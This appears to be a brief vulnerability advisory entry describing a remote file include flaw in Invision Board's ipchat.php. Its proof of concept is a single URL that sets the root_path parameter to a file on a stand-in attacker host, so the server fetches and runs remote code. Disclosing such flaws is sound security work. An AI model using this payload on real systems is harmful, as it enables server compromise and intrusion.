• info
• discussion
• exploit
• solution
• references

Invision Board ipchat.php Remote File Include Vulnerability

The following proof of concept was provided:

http://www.example.com/ipchat.php?root_path=http://www.attacker.com/conf_global.php